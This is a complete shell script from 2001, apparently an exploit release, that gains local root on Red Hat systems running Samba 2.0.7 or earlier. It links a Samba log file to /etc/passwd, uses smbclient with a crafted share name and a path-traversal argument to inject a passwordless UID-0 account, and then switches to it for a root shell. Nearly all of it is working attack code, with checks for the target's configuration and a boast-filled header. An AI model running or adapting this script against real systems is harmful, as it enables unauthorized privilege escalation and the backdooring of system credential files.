#/bin/sh
#
# Samba <=2.0.7 xploit for RH 5.1-7.0
#   by MostaraC(aka Snyggast) @2001, mail: yuggoboy@hotmail.com
#  Tested on RH 7.0 with no updates
#     Use it wisely and make the Net more secure
# Author is not responsible for any illegal usage of this script
#
# Knowledge is power, and power is knowledge.../by InformationHungry
# He starved to death coz he dossed own ISP ;)
# Latehours quick-shit for the needing ones ;)
# Next release will be a lynx-sploit, possibly remote
# C U @Defcon

echo "Samba <=2.0.7 xploit for RH 5.1-7.0"
echo "  by Mostarac @2001"
echo

PROC=`/usr/bin/pstree |/bin/grep smbd`

CONF1="/etc/samba/smb.conf"
CONF2="/etc/smb.conf"
CONF3="/usr/local/etc/smb.conf"

echo "*** Checking for samba..."

if [ ! -z "$PROC" ]; then
  echo "    Samba is running. Excellent"
else
  echo "    Samba is NOT running. Exploiting system not possible"
  echo "    Exiting script...Goodbye"
  exit 0
fi

echo "*** Checking possible configuration files..."

if [ -f "$CONF3" ]; then
  CONF="$CONF3"
fi
if [ -f "$CONF2" ]; then
        CONF="$CONF2"
fi
if [ -f "$CONF1" ]; then
        CONF="$CONF1"
fi
if [ -z "$CONF" ]; then
  echo "    Didnt find smb.conf. Exploiting system not possible"
  echo "    Exiting script...Goodbye"
  exit 0
else
  echo "    Config file exists at:" $CONF
fi

echo "*** Checking the log file for accurate defitinion..."
LOG1=`/bin/grep -i "log file ="  /etc/samba/smb.conf`
LOG2=`/bin/grep -i "log file=" /etc/samba/smb.conf`


if [ ! -z "$LOG1" ]; then
  LOG="$LOG1"
fi
if [ ! -z "$LOG2" ]; then
  LOG="$LOG2"
fi
if [ ! -z "$LOG" ]; then
  echo "    Logfile definition found in smb.conf"
else
  echo "    No logfile defitnition."
  echo "    Exiting script...Goodbye"
  exit 0
fi

echo "*** Exploiting the system..."
rm -rf /tmp/x.log
ln -s /etc/passwd /tmp/x.log
smbclient //localhost/"`perl -e '{print "\n\nrewt::0:0::/:/bin/sh\n"}'`" -n 
../../../tmp/x -N
echo "    Don't forget to clean /etc/passwd!"
echo "    Resistance is futile, you all will be assimilated"
echo "    Voila...Rootshell"
su rewt